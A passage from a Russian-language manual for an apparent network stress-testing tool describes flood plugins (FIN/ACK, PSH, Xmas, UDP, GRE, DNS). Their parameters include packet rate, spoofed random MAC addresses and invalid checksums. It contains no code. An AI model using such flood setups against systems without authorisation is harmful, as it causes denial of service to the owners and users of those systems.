Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 78;

Табл. 78 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 79.

Табл. 79 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

FIN/ACK Flood

FIN/ACK Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленными флагами FIN и ACK, что может привести к ненужному завершению активных соединений. Этот шаблон помогает проверить, как сервер реагирует на такие запросы.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 80;

Табл. 80 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 81;

Табл. 81 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 82;

Табл. 82 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 83;

Табл. 83 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 84;

Табл. 84 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 85.

Табл. 85 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

PSH Flood

PSH Flood – плагин для генерации трафика, который отправляет большое количество пакетов с установленным флагом PSH, требующих немедленной обработки данных на стороне получателя. Этот шаблон используется для тестирования пропускной способности сервера и его способности обрабатывать интенсивный трафик.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 86;

    Табл. 86 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 87;

Табл. 87 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 88;

Табл. 88 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 89;

Табл. 89 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 90;

Табл. 90 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 91.

Табл. 91 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

PSH/ACK Flood

PSH/ACK Flood – плагин для генерации трафика, который отправляет большое количество пакетов с флагами PSH и ACK, создавая нагрузку на сервер из-за необходимости немедленной обработки данных. Этот шаблон помогает оценить, как сервер справляется с высокой интенсивностью запросов.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 92;

    Табл. 92 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 93;

Табл. 93 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 94;

Табл. 94 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 95;

Табл. 95 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 96;

Табл. 96 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 97.

Табл. 97 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

Xmas Flood (All flags)

Xmas Flood (All flags) – плагин для генерации трафика, который отправляет большое количество пакетов c установленными всеми флагами TCP (URG, ACK, PSH, RST, SYN, FIN). Этот шаблон используется для проверки устойчивости сетевых устройств и систем обнаружения вторжений к необычным и потенциально вредоносным пакетам.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 98;

Табл. 98 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 99;

Табл. 99 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 100;

Табл. 100 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 101;

Табл. 101 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
Случайный Sequence NumberСлучайное число, используемое для инициализации последовательности номеров в протоколах связи (например, TCP)Включить/выключить тумблер
Значение Sequence NumberТекущее число в последовательности, указывающее порядок данных в потоке передачиЗадайте числовое значение (по умолчанию, значение Sequence Number является: «0-4294967295»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 102;

Табл. 103 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 103.

Табл. 103 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

UDP Flood

UDP Flood – плагин для генерации трафика, который отправляет большой объем UDP-пакетов на целевой сервер, что может привести к исчерпанию пропускной способности и перегрузке ресурсов сервера. Этот шаблон позволяет протестировать устойчивость сети к атакам, использующим UDP-трафик.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 104;

Табл. 104 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 105;

Табл. 105 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 106;

Табл. 106 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина UDP, описание которых указаны в Табл. 107.

Табл. 107 – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в UDP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
Отправлять пейлоадПейлоад — это данные, которые передаются в UDP-пакете. В данном случае параметр указывает на необходимость отправки пейлоада вместе с UDP-пакетомВключение или выключение тумблера
Если тумблер «Отправлять пейлоад» включен
Случайные данныеЭтот параметр подразумевает, что содержимое пейлоада будет генерироваться случайным образом. Это может включать случайные байты или строки, что делает трафик менее предсказуемым.Включение или выключение тумблера
Если тумблер «Случайные данные» выключен
Base64 строкаУказывает, будет ли содержимое пейлоада интерпретироваться или кодироваться как Base64 строкаВключение или выключение тумблера
Размер пейлоадаЭтот параметр определяет размер данных в пейлоаде UDP-пакета. Значение может варьироваться от 0 до 1300 байт.Задать числовые значения (по умолчанию, значение указано: «0-1300»)
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 108;

Табл. 108 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 109.

Табл. 109 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

GRE Flood

GRE Flood – плагин для генерации трафика, который генерирует и отправляет большое количество пакетов с заголовком GRE (Generic Routing Encapsulation) с целью перегрузить пропускную способность сети.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 110;

Табл. 110 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 111;

Табл. 111 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 112;

Табл. 112 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. Параметры плагина – параметры настроек плагина GRE, описание которых указаны в Табл. 112а;

Табл. 112а – Параметры «Плагина»

НазваниеОписаниеЗначение
Невалидная чек-суммаЧек-сумма используется в IP-пакетах для проверки целостности данных. Установка невалидной чек-суммы означает, что отправляемые пакеты будут содержать неправильное значение чек-суммы, что может привести к тому, что получатель отвергнет эти пакеты или обработает их неправильно.Включение или выключение тумблера
  1. Параметры скорости – параметр, отвечающий за скорость передачи пакетов, описание которого указано в Табл. 113;

Табл. 113 – Параметр «Скорость»

НазваниеОписаниеЗначение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Пакетов в секундуКакое количество пакетов будет отправлено в одну секундуЗадайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 114.

Табл. 114 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

DNS Flood

DNS Flood – плагин для генерации трафика, который генерирует и отправляет большое количество DNS-запросов с целью перегрузить DNS-сервер или пропускную способность сети.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 114а;

Табл. 114а – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 114б;

